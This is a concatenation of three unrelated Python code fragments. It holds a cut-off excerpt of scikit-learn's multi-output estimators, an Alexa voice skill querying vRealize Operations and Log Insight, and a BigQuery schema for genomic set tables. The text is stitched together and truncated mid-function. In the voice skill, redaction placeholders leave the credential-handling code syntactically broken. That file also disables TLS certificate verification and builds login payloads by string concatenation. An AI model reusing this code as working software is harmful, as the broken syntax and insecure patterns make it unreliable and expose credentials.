if not hasattr(self.estimator, "predict"):
raise ValueError("The base estimator should implement"
" a predict method")
X = check_array(X, accept_sparse=True)
y = Parallel(n_jobs=self.n_jobs)(
delayed(e.predict)(X)
for e in self.estimators_)
return np.asarray(y).T
def _more_tags(self):
return {'multioutput_only': True}
class MultiOutputRegressor(RegressorMixin, _MultiOutputEstimator):
"""Multi target regression
This strategy consists of fitting one regressor per target. This is a
simple strategy for extending regressors that do not natively support
multi-target regression.
.. versionadded:: 0.18
Parameters
----------
estimator : estimator object
An estimator object implementing :term:`fit` and :term:`predict`.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for :meth:`fit`.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
When individual estimators are fast to train or predict
using `n_jobs>1` can result in slower performance due
to the overhead of spawning processes.
.. versionchanged:: v0.20
`n_jobs` default changed from 1 to None
Attributes
----------
estimators_ : list of ``n_output`` estimators
Estimators used for predictions.
Examples
--------
>>> import numpy as np
>>> from sklearn.datasets import load_linnerud
>>> from sklearn.multioutput import MultiOutputRegressor
>>> from sklearn.linear_model import Ridge
>>> X, y = load_linnerud(return_X_y=True)
>>> clf = MultiOutputRegressor(Ridge(random_state=123)).fit(X, y)
>>> clf.predict(X[[0]])
array([[176..., 35..., 57...]])
"""
@_deprecate_positional_args
def __init__(self, estimator, *, n_jobs=None):
super().__init__(estimator, n_jobs=n_jobs)
@if_delegate_has_method('estimator')
def partial_fit(self, X, y, sample_weight=None):
"""Incrementally fit the model to data.
Fit a separate model for each output variable.
Parameters
----------
X : (sparse) array-like, shape (n_samples, n_features)
Data.
y : (sparse) array-like, shape (n_samples, n_outputs)
Multi-output targets.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying regressor supports sample
weights.
Returns
-------
self : object
"""
super().partial_fit(
X, y, sample_weight=sample_weight)
class MultiOutputClassifier(ClassifierMixin, _MultiOutputEstimator):
"""Multi target classification
This strategy consists of fitting one classifier per target. This is a
simple strategy for extending classifiers that do not natively support
multi-target classification
Parameters
----------
estimator : estimator object
An estimator object implementing :term:`fit`, :term:`score` and
:term:`predict_proba`.
n_jobs : int or None, optional (default=None)
The number of jobs to use for the computation.
It does each target variable in y in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
.. versionchanged:: v0.20
`n_jobs` default changed from 1 to None
Attributes
----------
classes_ : array, shape = (n_classes,)
Class labels.
estimators_ : list of ``n_output`` estimators
Estimators used for predictions.
Examples
--------
>>> import numpy as np
>>> from sklearn.datasets import make_multilabel_classification
>>> from sklearn.multioutput import MultiOutputClassifier
>>> from sklearn.neighbors import KNeighborsClassifier
>>> X, y = make_multilabel_classification(n_classes=3, random_state=0)
>>> clf = MultiOutputClassifier(KNeighborsClassifier()).fit(X, y)
>>> clf.predict(X[-2:])
array([[1, 1, 0], [1, 1, 1]])
"""
@_deprecate_positional_args
def __init__(self, estimator, *, n_jobs=None):
super().__init__(estimator, n_jobs=n_jobs)
def fit(self, X, Y, sample_weight=None, **fit_params):
"""Fit the model to data matrix X and targets Y.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input data.
Y : array-like of shape (n_samples, n_classes)
The target values.
sample_weight : array-like of shape (n_samples,) or None
Sample weights. If None, then samples are equally weighted.
Only supported if the underlying classifier supports sample
weights.
**fit_params : dict of string -> object
Parameters passed to the ``estimator.fit`` method of each step.
Returns
-------
self : object
"""
super().fit(X, Y, sample_weight, **fit_params)
self.classes_ = [estimator.classes_ for estimator in self.estimators_]
return self
@property
def predict_proba(self):
"""Probability estimates.
Returns prediction probabilities for each class of each output.
This method will raise a ``ValueError`` if any of the
estimators do not have ``predict_proba``.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data
Returns
-------
p : array of shape (n_samples, n_classes), or a list of n_outputs \
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute :term:`classes_`.
.. versionchanged:: 0.19
This function now returns a list of arrays where the length of
the list is ``n_outputs``, and each array is (``n_samples``,
``n_classes``) for that particular output.
| |
<filename>vrobbie.py
#!/usr/bin/python
import json
import logging
import requests
import collections
import time
import re
import sys
import os
from threading import Thread
from operator import itemgetter
from itertools import groupby
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session, request, context, version
# Vars and Configurations
bearertoken = ""
# Edit with IP or FQDN of vrops and LI node
vropsHost = ""
liHost = ""
# Authentication is intially via credentials set. Subsequent calls use a
# bearer token.
vropsuser = ""
vropspassword = ""
vropsauthsource = "local"
liprovider = "ActiveDirectory"
liusername = ""
lipassword = ""
# For some labs, using self-signed will result in error during request due to cert check
# flip this flag to False to bypass certificate checking in those cases. I have suppressed the warning
# normally thrown by urllib3 but this is NOT RECOMMENDED!
verify = False
if not verify:
requests.packages.urllib3.disable_warnings()
app = Flask(__name__)
ask = Ask(app,"/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
##############################################
# HELPERS
# - Fetchers
# - Handling voice service errors
# - Parsing and preparing response_msg
##############################################
def datacenter_report():
while True:
dc_report_dict = dict()
token = json.loads(liGetToken(liusername, lipassword, liprovider))
dc_report_dict["vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000", "bin-width=all&aggregation-function=UCOUNT&aggregation-field=com.vmware.vsphere:vmw_hostd_vmotion_id", token["sessionId"]))
dc_report_dict["DRS vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS DrmExecuteVMotionLRO", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Created"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmCreatedEvent/vc_event_type/CONTAINS com.vmware.vim25.vmclonedevent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Deleted"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmRemovedEvent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["RConsole Sessions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS Local connection for mks established", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
with open("prefetch/dcreport", 'w') as outfile:
json.dump(dc_report_dict, outfile)
print "dcreport updated at " + time.strftime("%Y-%m-%d %H:%M:%S")
time.sleep(300)
def more_info():
#Called when user wants more information on the impacted resource from the Alerts tree
if session.attributes["CurrentTree"] == "Alerts":
resource = vropsRequest("api/resources/"+session.attributes["CurrentObject"],"GET")
alertsQueryPayload = {
'resource-query': {
'resourceId': [session.attributes["CurrentObject"]]
},
'activeOnly': True
}
resourceAlerts = vropsRequest("api/alerts/query","POST",payload=alertsQueryPayload)
resourceName = resource["resourceKey"]["name"]
resourceHealth = resource["resourceHealth"]
resourceAlertCount = resourceAlerts["pageInfo"]["totalCount"]
outputSpeech = "The resource; {0}; is; {1}; for health status. There are {2} alerts associated with this resource. Shall I read those alerts?".format(resourceName, resourceHealth, resourceAlertCount)
with open("sessionData/"+session.sessionId+"resAlerts", 'w') as outfile:
json.dump(resourceAlerts, outfile)
session.attributes["ResAlertsIndex"] = 0
session.attributes["CurrentTree"] = "Resource"
return outputSpeech
#Called when user wants more information on an alert from the Resource tree
if session.attributes["CurrentTree"] == "Resource":
alert = vropsRequest("api/alerts/"+session.attributes["CurrentAlert"],"GET")
alertDef = vropsRequest("api/alertdefinitions/"+alert["alertDefinitionId"],"GET")
alertDesc = alertDef["description"]
recommendations=alertDef["states"][0]["recommendationPriorityMap"]
if (len(recommendations) == 1):
recQualifier = "only"
else:
recQualifier = "first"
recDesc = vropsRequest("api/recommendations/"+recommendations.keys()[0],"GET")
outputSpeech = "{0}. The {1} recommendation is as follows; {2}".format(alertDesc, recQualifier, recDesc["description"])
return outputSpeech
#Called when user wants more information on groups of alerts for a definition
if session.attributes["CurrentTree"] == "GroupedAlerts":
payload = json.loads('{"resourceId":'+ json.dumps(session.attributes["impactedResources"]) +'}')
resources = vropsRequest("api/resources/query","POST",payload=payload)
resourceList = resources["resourceList"]
resourceDict = {}
for res in resourceList:
resourceDict[res["resourceKey"]["name"]] = res["identifier"]
session.attributes["resourceDict"] = resourceDict
outputSpeech = ""
return outputSpeech
def continues():
if session.attributes["CurrentTree"] == "Alerts":
with open("sessionData/"+session.sessionId+"badgeAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["AlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more cirtical alerts. Would you like more information on this resource?".format(resourceName, alertDefinition)
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this resource?".format(resourceName, alertDefinition)
session.attributes["AlertsIndex"] += 1
session.attributes["CurrentObject"] = resource["identifier"]
return outputSpeech
if session.attributes["CurrentTree"] == "GroupedAlerts":
with open("sessionData/"+session.sessionId+"groupAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
definition = alerts[session.attributes["AlertsIndex"]]
alertDefinition = definition[0]["alertDefinitionName"]
impactedResources = []
for res in definition:
impactedResources.append(res["resourceId"])
session.attributes["impactedResources"] = impactedResources
session.attributes["alertDefinition"] = alertDefinition
numOfResources = len(definition)
if numOfResources == 1:
resourceText = "resource is"
else:
resourceText = "resources are"
if (len(alerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "For the alert: {0}, {1} {2} impacted. There are no more alerts. More information on this alert?".format(alertDefinition, numOfResources, resourceText)
else:
outputSpeech = "For the alert: {0}, {1} {2} impacted. Next or more info?".format(alertDefinition, numOfResources, resourceText)
session.attributes["AlertsIndex"] += 1
return outputSpeech
if session.attributes["CurrentTree"] == "Resource":
with open("sessionData/"+session.sessionId+"resAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["ResAlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["ResAlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more alerts. Would you like more information on this alert?".format(resourceName, alertDefinition)
elif len(criticalAlerts) == 0:
outputSpeech = "Reading active alerts from newest to oldest. The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
session.attributes["CurrentAlert"] = alert["alertId"]
return outputSpeech
def on_element_select(token):
if session.attributes["CurrentTree"] == "GroupedAlerts":
resource = vropsRequest("api/resources/"+token,"GET")
resourceProps = vropsRequest("api/resources/"+token+"/properties","GET")
resourceLatest = vropsRequest("api/resources/"+token+"/stats/latest","GET")
if resource["resourceKey"]["resourceKindKey"] == "VirtualMachine":
#Build complete response Here
vmname = resource["resourceKey"]["name"]
guestOS = [d["value"] for d in resourceProps["property"] if d["name"]=="config|guestFullName"][0]
numCpu = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|numCpu"][0]
memKB = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|memoryKB"][0]
toolsStatus = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsRunningStatus"][0]
toolsVersion = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsVersion"][0]
#guestDiskPercent = [d["statKey"]["data"] for d in resourceLatest["values"]["stat-list"]["stat"] if d["statKey"]["key"]=="guestfilesystem|percentage_total"]
text = {
"secondaryText": {
"type": "RichText",
"text": "<br/><b>Number of vCPU: </b>" + numCpu + "<br/>" + \
"<b>Memory Allocation (KB): </b>" + memKB + "<br/>" + \
"<b>Guest OS Name: </b>" + guestOS + "<br/>" + \
"<b>Tools Status: </b>" + toolsStatus + "<br/>" + \
"<b>Tools Version: </b>" + toolsVersion + "<br/>"
#"<b>Guest Filesystem Used: </b>" + guestDiskPercent + "%%<br/>"
},
"primaryText": {
"type": "RichText",
"text": "<font size='3'>"+resource["resourceKey"]["name"]+"</font>"
}
}
fullResponse = question("Here are the " + resource["resourceKey"]["resourceKindKey"] + " details"). \
display_render(title=resource["resourceKey"]["resourceKindKey"] + "details",template="BodyTemplate1",text=text,background_image_url=render_template('backgroundImageURL'),backButton='VISIBILE')
return fullResponse
def backout():
if session.attributes["CurrentTree"] == "Resource":
session.attributes["CurrentTree"] = "Alerts"
outputSpeech = "Returning to Critical Alerts list."
elif session.attributes["CurrentTree"] == "GroupedAlerts":
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
elif session.attributes["CurrentTree"] == "Alerts":
sessionCleanup()
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
else:
sessionCleanup()
outputSpeech = "I am waiting for your query"
return outputSpeech
def interactive_resp(data):
if session.attributes["CurrentTree"] == "GroupedAlerts":
listItems = []
resDict = session.attributes["resourceDict"]
for res in resDict:
listItem = {
"token":resDict[res],
"textContent": {
"primaryText": {
"text":res,
"type":"PlainText"
}
}
}
listItems.append(listItem)
enhancedResponse = question("Here are the impacted objects.").list_display_render(template="ListTemplate1", title="Impacted Objects", backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), listItems=listItems)
return enhancedResponse
def liGetToken(user=liusername, passwd=lipassword, authSource=liprovider):
url = "https://" + liHost + "/api/v1/sessions"
payload = "{\n \"provider\":\"" + liprovider + "\",\n \"username\":\"" + liusername + "\",\n \"password\":\"" + lipassword + "\"\n}"
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
def vropsGetToken(user=vropsuser, passwd=vrop<PASSWORD>, authSource=vropsauthsource, host=vropsHost):
if not bearertoken:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
elif int(bearertoken["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=verify)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
else:
return json.dumps(bearertoken)
else:
return json.dumps(bearertoken)
def loginsightQuery(constraints,params,token):
url = "https://" + liHost + "/api/v1/aggregated-events/" + constraints + "?" + params
headers = {
'authorization': 'Bearer ' + token
}
response = requests.request('GET', url, headers=headers, verify=verify)
return response.text
def vropsRequest(request,method,querystring="",payload=""):
global bearertoken
bearertoken = json.loads(vropsGetToken())
url = "https://" + vropsHost + "/suite-api/" + request
querystring = querystring
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json",
'content-type': "application/json"
}
if (querystring != "") and (payload != ""):
response = requests.request(method, url, headers=headers, params=querystring, json=payload, verify=verify)
elif (querystring != ""):
response = requests.request(method, url, headers=headers, params=querystring, verify=verify)
elif (payload != ""):
response = requests.request(method, url, headers=headers, json=payload, verify=verify)
else:
response = requests.request(method, url, headers=headers, verify=verify)
print | |
#
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
from enum import Enum
from rdr_service.model.bq_base import BQTable, BQSchema, BQView, BQField, BQFieldTypeEnum, BQFieldModeEnum
from rdr_service.genomic_enums import GenomicSetStatus as _GenomicSetStatus, \
GenomicSetMemberStatus as _GenomicSetMemberStatus, GenomicValidationFlag as _GenomicValidationFlag, \
GenomicJob as _GenomicJob, GenomicWorkflowState as _GenomicWorkflowState, \
GenomicSubProcessStatus as _GenomicSubProcessStatus, GenomicSubProcessResult as _GenomicSubProcessResult, \
GenomicManifestTypes as _GenomicManifestTypes, GenomicContaminationCategory as _GenomicContaminationCategory, \
GenomicQcStatus as _GenomicQcStatus
# Convert weird participant_enums to standard python enums.
GenomicSetStatusEnum = Enum('GenomicSetStatusEnum', _GenomicSetStatus.to_dict())
GenomicSetMemberStatusEnum = Enum('GenomicSetMemberStatusEnum', _GenomicSetMemberStatus.to_dict())
GenomicValidationFlag = Enum('GenomicValidationFlag', _GenomicValidationFlag.to_dict())
GenomicSubProcessStatusEnum = Enum('GenomicSubProcessStatusEnum', _GenomicSubProcessStatus.to_dict())
GenomicSubProcessResultEnum = Enum('GenomicSubProcessResultEnum', _GenomicSubProcessResult.to_dict())
GenomicJobEnum = Enum('GenomicJobEnum', _GenomicJob.to_dict())
GenomicWorkflowStateEnum = Enum('GenomicWorkflowStateEnum', _GenomicWorkflowState.to_dict())
GenomicQcStatusEnum = Enum('GenomicQcStatusEnum', _GenomicQcStatus.to_dict())
GenomicContaminationCategoryEnum = Enum('GenomicContaminationCategoryEnum', _GenomicContaminationCategory.to_dict())
GenomicManifestTypesEnum = Enum('GenomicManifestTypesEnum', _GenomicManifestTypes.to_dict())
class BQGenomicSetSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve the RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
orig_created = BQField('orig_created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
orig_modified = BQField('orig_modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_name = BQField('genomic_set_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genomic_set_criteria = BQField('genomic_set_criteria', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genomic_set_version = BQField('genomic_set_version', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
genomic_set_file = BQField('genomic_set_file', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genomic_set_file_time = BQField('genomic_set_file_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_status = BQField('genomic_set_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetStatusEnum)
genomic_set_status_id = BQField('genomic_set_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetStatusEnum)
validated_time = BQField('validated_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
class BQGenomicSet(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_set'
__schema__ = BQGenomicSetSchema
class BQGenomicSetView(BQView):
__viewname__ = 'v_genomic_set'
__viewdescr__ = 'Genomic Set View'
__pk_id__ = 'id'
__table__ = BQGenomicSet
class BQGenomicSetMemberSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve the RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
orig_created = BQField('orig_created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
orig_modified = BQField('orig_modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_id = BQField('genomic_set_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
participant_id = BQField('participant_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
ny_flag = BQField('ny_flag', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
sex_at_birth = BQField('sex_at_birth', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genome_type = BQField('genome_type', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
biobank_id = BQField('biobank_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
package_id = BQField('package_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
validation_status = BQField('validation_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetMemberStatusEnum)
validation_status_id = BQField('validation_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetMemberStatusEnum)
# validation_flags is an array of GenomicValidationFlag Enum values.
validation_flags = BQField('validation_flags', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
validated_time = BQField('validated_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
sample_id = BQField('sample_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
sample_type = BQField('sample_type', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
reconcile_cvl_job_run_id = BQField('reconcile_cvl_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
sequencing_file_name = BQField('sequencing_file_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
reconcile_gc_manifest_job_run_id = BQField('reconcile_gc_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
reconcile_metrics_bb_manifest_job_run_id = BQField('reconcile_metrics_bb_manifest_job_run_id',
BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
reconcile_metrics_sequencing_job_run_id = BQField('reconcile_metrics_sequencing_job_run_id',
BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
ai_an = BQField('ai_an', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_box_plate_id = BQField('gc_manifest_box_plate_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_box_storage_unit_id = BQField('gc_manifest_box_storage_unit_id', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_contact = BQField('gc_manifest_contact', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_email = BQField('gc_manifest_email', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_failure_description = BQField('gc_manifest_failure_description', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_failure_mode = BQField('gc_manifest_failure_mode', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_matrix_id = BQField('gc_manifest_matrix_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_parent_sample_id = BQField('gc_manifest_parent_sample_id', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_quantity_ul = BQField('gc_manifest_quantity_ul', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
gc_manifest_sample_source = BQField('gc_manifest_sample_source', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_study = BQField('gc_manifest_study', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_study_pi = BQField('gc_manifest_study_pi', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_test_name = BQField('gc_manifest_test_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_total_concentration_ng_per_ul = BQField('gc_manifest_total_concentration_ng_per_ul',
BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
gc_manifest_total_dna_ng = BQField('gc_manifest_total_dna_ng', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
gc_manifest_tracking_number = BQField('gc_manifest_tracking_number', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_treatments = BQField('gc_manifest_treatments', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_visit_description = BQField('gc_manifest_visit_description', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_well_position = BQField('gc_manifest_well_position', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gem_a1_manifest_job_run_id = BQField('gem_a1_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
gem_a2_manifest_job_run_id = BQField('gem_a2_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
gem_pass = BQField('gem_pass', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gem_a3_manifest_job_run_id = BQField('gem_a3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
aw3_manifest_job_run_id = BQField('aw3_manifest_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
aw4_manifest_job_run_id = BQField('aw4_manifest_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
cvl_aw1c_manifest_job_run_id = BQField('cvl_aw1c_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_aw1cf_manifest_job_run_id = BQField('cvl_aw1cf_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w1_manifest_job_run_id = BQField('cvl_w1_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w2_manifest_job_run_id = BQField('cvl_w2_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w3_manifest_job_run_id = BQField('cvl_w3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w4_manifest_job_run_id = BQField('cvl_w4_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w4f_manifest_job_run_id = BQField('cvl_w4f_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
genomic_workflow_state = BQField('genomic_workflow_state', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicWorkflowStateEnum)
genomic_workflow_state_id = BQField('genomic_workflow_state_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicWorkflowStateEnum)
genomic_workflow_state_modified_time = BQField('genomic_workflow_state_modified_time', BQFieldTypeEnum.DATETIME,
BQFieldModeEnum.NULLABLE)
genomic_workflow_state_history = BQField('genomic_workflow_state_history', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
collection_tube_id = BQField('collection_tube_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_site_id = BQField('gc_site_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
arr_aw3_manifest_job_run_id = BQField('arr_aw3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
wgs_aw3_manifest_job_run_id = BQField('wgs_aw3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
report_consent_removal_date = BQField('report_consent_removal_date',
BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
qc_status = BQField('qc_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicQcStatusEnum)
qc_status_id = BQField('qc_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicQcStatusEnum)
fingerprint_path = BQField('fingerprint_path', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
aw1_file_processed_id = BQField('aw1_file_processed_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
aw2_file_processed_id = BQField('aw2_file_processed_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
dev_note = BQField('dev_note', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
biobank_id_str = BQField('biobank_id_str', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
aw2f_job_run_id = BQField('aw2f_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
class BQGenomicSetMember(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_set_member'
__schema__ = BQGenomicSetMemberSchema
